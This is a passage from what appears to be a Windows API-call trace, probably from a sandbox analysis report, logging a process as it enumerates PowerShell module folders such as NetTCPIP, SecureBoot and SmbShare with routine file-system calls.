nFileSizeHigh=0x0, nFileSizeLow=0x3eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPSetting.cdxml", cAlternateFileName="")) returned 1 [0177.526] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTransportFilter.cdxml", cAlternateFileName="")) returned 1 [0177.526] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPEndpoint.cdxml", cAlternateFileName="")) returned 1 [0177.527] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPSetting.cdxml", cAlternateFileName="")) returned 1 [0177.527] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x393a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPConfiguration.psm1", cAlternateFileName="")) returned 1 [0177.527] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x862, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP.psd1", cAlternateFileName="")) returned 1 [0177.527] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11582, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.527] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb6a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.527] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Test-NetConnection.psm1", cAlternateFileName="")) returned 1 [0177.527] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.527] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.529] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0177.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.529] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.529] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0177.529] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\", lpFilePart=0x0) returned 0x3c [0177.529] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0177.530] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.531] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetCompartment.cdxml", cAlternateFileName="")) returned 1 [0177.531] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPAddress.cdxml", cAlternateFileName="")) returned 1 [0177.536] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0177.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.537] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1")) returned 0x20 [0177.539] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c [0177.539] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\", lpFilePart=0x0) returned 0x4d [0177.543] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0177.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.544] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c [0177.547] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.548] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.549] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c [0177.549] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\", lpFilePart=0x0) returned 0x4d [0177.552] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.552] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1")) returned 0x20 [0177.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.554] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47 [0177.554] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\", lpFilePart=0x0) returned 0x48 [0177.609] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.610] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47 [0177.610] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\", lpFilePart=0x0) returned 0x48 [0177.614] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0177.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.798] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot", lpFilePart=0x0) returned 0x3d [0177.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.799] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.799] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot", lpFilePart=0x0) returned 0x3d [0177.799] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\", lpFilePart=0x0) returned 0x3e [0177.799] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0177.799] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.800] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.800] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0b9cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x15a0b9cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x15a0b9cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot.psd1", cAlternateFileName="")) returned 1 [0177.800] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0b9cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x15a0b9cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x15a0b9cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot.psd1", cAlternateFileName="")) returned 0 [0177.800] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0177.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.800] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot\\secureboot.psd1")) returned 0x20 [0177.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.800] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0177.801] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", lpFilePart=0x0) returned 0x3c [0177.801] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0177.808] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.808] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.808] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.format.ps1xml", cAlternateFileName="")) returned 1 [0177.809] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.types.ps1xml", cAlternateFileName="")) returned 1 [0177.809] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbBandwidthLimit.cdxml", cAlternateFileName="")) returned 1 [0177.809] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f87, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientConfiguration.cdxml", cAlternateFileName="")) returned 1 [0177.809] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0177.809] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x881, 